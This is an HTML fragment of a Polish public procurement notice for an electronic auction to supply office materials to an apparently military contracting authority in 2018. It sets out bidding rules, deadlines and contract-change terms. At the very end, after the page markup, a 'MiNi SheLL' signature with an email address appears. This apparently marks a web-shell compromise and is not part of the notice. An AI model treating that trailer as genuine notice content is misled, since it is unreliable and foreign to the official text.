Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6">https://licytacje.uzp.gov.pl</span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7">www.1bltr.wp.mil.pl</span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8">1.	Wykonawca ma prawo złożyć tylko jeden wniosek. 2.	Z platformy w pełnym zakresie mogą korzystać wyłącznie Wykonawcy zarejestrowani w systemie pod adresem https://licytacje.uzp.gov.pl Wykonawca, aby umożliwić Zamawiającemu dopuszczenie do udziału w licytacji, winien zarejestrować się w systemie dostępnym na stronie https://licytacje.uzp.gov.pl, a wraz z wnioskiem o dopuszczenie do udziału w licytacji, powinien przekazać Zamawiającemu informację o swoim loginie. 3.	Login powinien uniemożliwić identyfikację Wykonawcy. W przypadku niepodania loginu we wniosku, lub też błędnego podania loginu niezarejestrowanego na stronie https://licytacje.uzp.gov.pl, Zamawiający wezwie Wykonawcę do uzupełnienia w wyznaczonym terminie loginu, który umożliwi przypisanie Wykonawcy do prowadzonej licytacji poprzez jego wpisanie na listę Wykonawców (na platformie licytacji) biorących w niej udział. Brak uzupełnienia w wyznaczonym terminie loginu, skutkować będzie brakiem możliwości wzięcia udziału Wykonawcy w licytacji. Uwaga: nie należy przesyłać swojego hasła Zamawiającemu, ani udostępniać hasła osobom nieuprawnionym. 4.	Licytacja elektroniczna na dostawę materiałów i artykułów biurowych, będzie licytacją 1-etapową.5.	W toku licytacji elektronicznej Wykonawcy składają kolejne korzystniejsze postąpienia. Możliwość złożenia postąpień istnieje od otwarcia licytacji do jej zamknięcia.6.	Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą. 7.	W toku licytacji Wykonawcy proponują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz ewentualnie w groszach; grosze należy oddzielić od złotych kropką. Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia. Zamawiający przyjął za minimalne postąpienie wartość 500,00 PLN brutto (słownie: pięćset złotych). W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim Wykonawcom informacje o pozycji złożonych ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych przez nich ofert, z tym, że do momentu zamknięcia nie ujawni informacji umożliwiających identyfikację Wykonawców.8.	W celu zapewnienia aktualności listy postąpień niezbędne będzie samodzielne odświeżanie ekranu przy użyciu przycisku przeglądarki internetowej - system nie dokonuje odświeżania automatycznie.9.	Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje w chwili zamknięcia licytacji elektronicznej najniższą cenę brutto za realizację całego zamówienia.10.	Cena oferty winna obejmować wszystkie koszty i składniki wraz z narzutami niezbędne do wykonania przedmiotu zamówienia. Bezpośrednio po zamknięciu licytacji elektronicznej Zamawiający poda na swojej stronie internetowej nazwę oraz adres Wykonawcy, którego ofertę wybrano.11.	Formalności niezbędne do zawarci umowy jakie powinny zostać dopełnione po borze oferty: w celu zawarcia umowy Wykonawca winien:1)	przedłożyć pełnomocnictwo do zawarcia umowy, jeżeli nie wynika ono z treści wniosku o dopuszczenie do udziału w licytacji elektronicznej;2)	umowę regulującą współpracę, w przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o zamówienie;3)	przekazać drogą elektroniczną (fax, e-mail) informacje dotyczących danych do umowy (m.in. adres siedziby firmy, osoby do kontaktu) oraz inne niezbędne wynikające z treści umowy, wysokość kwoty netto wynikająca z oferty;4)	dla każdego artykułu z przedmiotu umowy wybrany Wykonawca musi złożyć dokumenty potwierdzające wymagania określone w opisie przedmiotu zamówienia np. karty produktu, opis przedmiotu itp. Niedopełnienie powyższych formalności stanowić będzie uchylenie się Wykonawcy od zawarcia Umowy.12. Czas trwania licytacji elektronicznej: 30 min.</span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja jednoetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: 30 min.</span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani">Nie</span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data">2018-06-11</span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"> 10:00:00</span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12">19.06.2018 godz.10:00</span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13">Licytacja zakończy się w dniu otwarcia licytacji o godzinie 10:30. Zamawiający zamyka licytację, gdy w podstawowym czasie nie została złożona żadna oferta ( postąpienie).</span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">Zgodnie ze wzorem istotnych warunków umowy, stanowiącym załącznik nr 4 do Ogłoszenia </span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.</span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje">Wszelkie informacje, w celu sprawnego przeprowadzenia postępowania o udzielenie zamówienie w trybie licytacji elektronicznej znajdują się w załączniku nr 1 do ogłoszenia - Informacje dotyczące postępowania w trybie licytacji elektronicznej. Od momentu otwarcia licytacji do momentu zamknięcia licytacji, zgodnie z art. 77 ustawy Pzp, Zamawiający i Wykonawcy przekazują wnioski, oświadczenia i inne drogą elektroniczną, za pośrednictwem platformy licytacyjnej. Zaproszenie do udziału w licytacji elektronicznej przekazane zostanie Wykonawcom przez Zamawiającego drogą elektroniczną. Wszelkie informacje dotyczące niniejszego postępowania do momentu upływu terminu otwarcia licytacji, będą zamieszczane na stronie internetowej Zamawiającego http://1bltr.wp.mil.pl/pl/110.html. Wszelka korespondencja powinna być opatrzna nr sprawy tj. 13/2018. Załącznikami do niniejszego ogłoszenia, udostępnionymi na stronie internetowej Zamawiającego http://1bltr.wp.mil.pl/pl/110.html, są: 1) informacje dotyczące postępowania w trybie licytacji elektronicznej, 2)opis przedmiotu zamówienia, 3) wniosek o dopuszczenie do udziału w licytacji elektronicznej, 4) istotne warunki umowy, 5) wzór oświadczenia o spełnianiu warunków udziału, 6) wzór oświadczenia o braku podstaw wykluczenia.</span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Dopuszcza się zmiany w zawartej umowie w zakresie: 1. terminu dostawy wynikająca z siły wyższej, 2. przepisów prawnych np. VAT, 3. określonego producenta, modelu i/lub typu przedmiotu umowy, w przypadku zakończenia jego produkcji lub wycofania go z produkcji, z tym że cena wskazana nie może ulec podwyższeniu, a parametry techniczne nie mogą być gorsze.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-06-11</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com